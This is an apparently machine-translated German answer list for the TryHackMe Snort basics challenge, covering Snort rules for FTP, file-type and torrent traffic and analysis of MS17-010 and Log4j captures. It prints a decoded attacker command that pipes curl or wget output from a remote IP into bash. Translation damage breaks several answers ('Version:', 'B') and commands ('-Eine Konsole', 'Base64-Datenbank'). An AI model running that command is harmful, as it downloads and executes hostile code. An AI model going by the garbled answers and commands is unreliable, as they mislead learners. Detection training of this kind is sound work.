Wir haben die Verwendung von Snort zur Analyse des FTP- und HTTP-Verkehrs durch Erstellen und Konfigurieren der entsprechenden Regeln behandelt. Um das Gelernte anzuwenden, haben wir vorhandene Netzwerkaufzeichnungen mit Snort analysiert, um die erstellten Regeln zu testen und Verkehrsmuster zu erkennen. Dies war Teil von TryHackMe Snort Challenge – Die Grundlagen.
Vollständiger Splunk SIEM-Kurs mit praktischen Szenarien
Höhepunkte
SNORT ist ein regelbasiertes Open-Source-System zur Erkennung und Verhinderung von Angriffen auf Netzwerke (NIDS/NIPS). Es wurde von Martin Roesch, Open-Source-Mitwirkenden und dem Cisco Talos-Team entwickelt und wird auch weiterhin von ihnen gepflegt. Fähigkeiten von Snort
- Live-Verkehrsanalyse
- Angriffs- und Sondenerkennung
- Paketprotokollierung
- Protokollanalyse
- Echtzeit-Alarmierung
- Module & Plugins
- Präprozessoren
- Plattformübergreifende Unterstützung! (Linux und Windows)
Snort IDS-Betriebsmodi
Sniffer-Modus
– Lesen Sie IP-Pakete und geben Sie sie in der Konsolenanwendung ein.Paketlogger-Modus
– Protokollieren Sie alle IP-Pakete (eingehend und ausgehend), die das Netzwerk besuchen.NIDS- und NIPS-Modi
: Protokollieren/löschen Sie die Pakete, die gemäß den benutzerdefinierten Regeln als bösartig eingestuft werden
Raum-Antworten | Snort-Challenge – Die Grundlagen
Wie hoch ist die Anzahl der erkannten Pakete?
Notiz: Sie müssen diese Frage richtig beantworten, bevor Sie die restlichen Fragen in dieser Aufgabe beantworten.
328
Untersuchen Sie die Protokolldatei.
Was ist die Zieladresse von Paket 63?
145.254.160.237
Untersuchen Sie die Protokolldatei.
Was ist die ACK-Nummer von Paket 64?
Version:
Untersuchen Sie die Protokolldatei.
Was ist die SEQ-Nummer von Paket 62?
Version:
B
Untersuchen Sie die Protokolldatei.
Was ist die TTL von Paket 65?
128
Untersuchen Sie die Protokolldatei.
Was ist die Quell-IP von Paket 65?
145.254.160.237
Untersuchen Sie die Protokolldatei.
Was ist der Quellport von Paket 65?
3372
Verwenden Sie die angegebene PCAP-Datei.
Schreiben Sie Regeln zur Erkennung von „alle TCP-Port 21“-Verkehr im angegebenen PCAP.
Wie hoch ist die Anzahl der erkannten Pakete?
614
Untersuchen Sie die Protokolldatei.
Wie lautet der Name des FTP-Dienstes?
Microsoft FTP-Dienst
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Alte Regeln deaktivieren/kommentieren.
Schreiben Sie eine Regel zum Erkennen fehlgeschlagener FTP-Anmeldeversuche im angegebenen PCAP.
Wie hoch ist die Anzahl der erkannten Pakete?
41
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Alte Regel deaktivieren/kommentieren.
Schreiben Sie eine Regel zum Erkennen erfolgreicher FTP-Anmeldungen im angegebenen PCAP.
Wie hoch ist die Anzahl der erkannten Pakete?
1
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Alte Regel deaktivieren/kommentieren.
Schreiben Sie eine Regel zur Erkennung von Fehlern FTP Anmeldeversuche mit einem gültigen Benutzernamen, aber einem falschen oder keinem Passwort.
Wie hoch ist die Anzahl der erkannten Pakete?
42
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Alte Regel deaktivieren/kommentieren.
Schreiben Sie eine Regel zur Erkennung von Fehlern FTP Anmeldeversuche mit dem Benutzernamen „Administrator“, aber einem falschen oder keinem Passwort.
Wie hoch ist die Anzahl der erkannten Pakete?
7
Navigieren Sie zum Aufgabenordner.
Verwenden Sie die angegebene PCAP-Datei.
Schreiben Sie eine Regel zum Erkennen der PNG-Datei im angegebenen PCAP.
Untersuchen Sie die Protokolle und identifizieren Sie den im Paket eingebetteten Softwarenamen.
Adobe Imagereadyq
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Alte Regel deaktivieren/kommentieren.
Schreiben Sie eine Regel zum Erkennen der GIF-Datei im angegebenen PCAP.
Untersuchen Sie die Protokolle und identifizieren Sie das im Paket eingebettete Bildformat.
GIF89a
Navigieren Sie zum Aufgabenordner.
Verwenden Sie die angegebene PCAP-Datei.
Schreiben Sie eine Regel zum Erkennen der Torrent-Metadatei im angegebenen PCAP.
Wie hoch ist die Anzahl der erkannten Pakete?
2
Untersuchen Sie die Protokoll-/Alarmdateien.
Wie heißt die Torrent-Anwendung?
BitTorrent
Untersuchen Sie die Protokoll-/Alarmdateien.
Was ist der MIME-Typ (Multipurpose Internet Mail Extensions) der Torrent-Metadatei?
Anwendung/x-bittorrent
Untersuchen Sie die Protokoll-/Alarmdateien.
Wie lautet der Hostname der Torrent-Metadatei?
tracker2.torrentbox.com
In diesem Abschnitt müssen Sie die Syntaxfehler in den angegebenen Regeldateien beheben.
Sie können jeden Regelsatz mit der folgenden Befehlsstruktur testen;
sudo snort -c local-X.rules -r mx-1.pcap -Eine Konsole
Beheben Sie den Syntaxfehler in der Datei „local-1.rules“ und sorgen Sie für einen reibungslosen Betrieb.
Wie hoch ist die Anzahl der erkannten Pakete?
16
Beheben Sie den Syntaxfehler in der Datei „local-2.rules“ und sorgen Sie für einen reibungslosen Betrieb.
Wie hoch ist die Anzahl der erkannten Pakete?
68
Beheben Sie den Syntaxfehler in der Datei „local-3.rules“ und sorgen Sie für einen reibungslosen Betrieb.
Wie hoch ist die Anzahl der erkannten Pakete?
87
Beheben Sie den Syntaxfehler in der Datei „local-4.rules“ und sorgen Sie für einen reibungslosen Betrieb.
Wie hoch ist die Anzahl der erkannten Pakete?
90
Beheben Sie den Syntaxfehler in der Datei „local-5.rules“ und sorgen Sie für einen reibungslosen Betrieb.
Wie hoch ist die Anzahl der erkannten Pakete?
155
Beheben Sie den logischen Fehler in der Datei „local-6.rules“, damit die Erstellung von Warnungen reibungslos funktioniert.
Wie hoch ist die Anzahl der erkannten Pakete?
2
Beheben Sie den logischen Fehler in der Datei „local-7.rules“, damit die Erstellung von Warnungen reibungslos funktioniert.
Wie heißt die gewünschte Option:
Nachricht
Navigieren Sie zum Aufgabenordner.
Verwenden Sie die angegebene PCAP-Datei.
Verwenden Sie die angegebene Regeldatei (local.rules), um den ms1710-Exploit zu untersuchen.
Wie hoch ist die Anzahl der erkannten Pakete?
25154
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Verwenden Sie die leere Datei local-1.rules, um eine neue Regel zum Erkennen von Nutzdaten zu schreiben, die das Schlüsselwort „\IPC$“ enthalten.
Wie hoch ist die Anzahl der erkannten Pakete?
12
Untersuchen Sie die Protokoll-/Alarmdateien.
Was ist der angeforderte Pfad?
\192.168.116.138\IPC$
Wie hoch ist der CVSS v2-Score der Sicherheitslücke MS17-010?
9.3
Verwenden Sie die angegebene PCAP-Datei.
Verwenden Sie die angegebene Regeldatei (local.rules), um den Log4j-Ausnutzvorgang zu untersuchen.
Wie hoch ist die Anzahl der erkannten Pakete?
26
Untersuchen Sie die Protokoll-/Alarmdateien.
Wie viele Regeln wurden ausgelöst?
4
Untersuchen Sie die Protokoll-/Alarmdateien.
Was sind die ersten sechs Ziffern der ausgelösten Regel-Seiten?
210037
Löschen Sie die vorherigen Protokoll- und Alarmdateien.
Verwenden Sie die leere Datei local-1.rules, um eine neue Regel zum Erkennen von Paketnutzdaten zu schreiben zwischen 770 und 855 Bytes.
Wie hoch ist die Anzahl der erkannten Pakete?
41
Untersuchen Sie die Protokoll-/Alarmdateien.
Was ist der Name des verwendeten Kodierungsalgorithmus?
Base64-Datenbank
Untersuchen Sie die Protokoll-/Alarmdateien.
Was ist die IP-ID des entsprechenden Pakets?
62808
Untersuchen Sie die Protokoll-/Alarmdateien.
Dekodieren Sie den kodierten Befehl.
Was ist der Befehl des Angreifers?
(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash
Wie hoch ist der CVSS v2-Score der Log4j-Sicherheitslücke?
9.3
Video-Komplettlösung | TryHackMe Snort Challenge – Die Grundlagen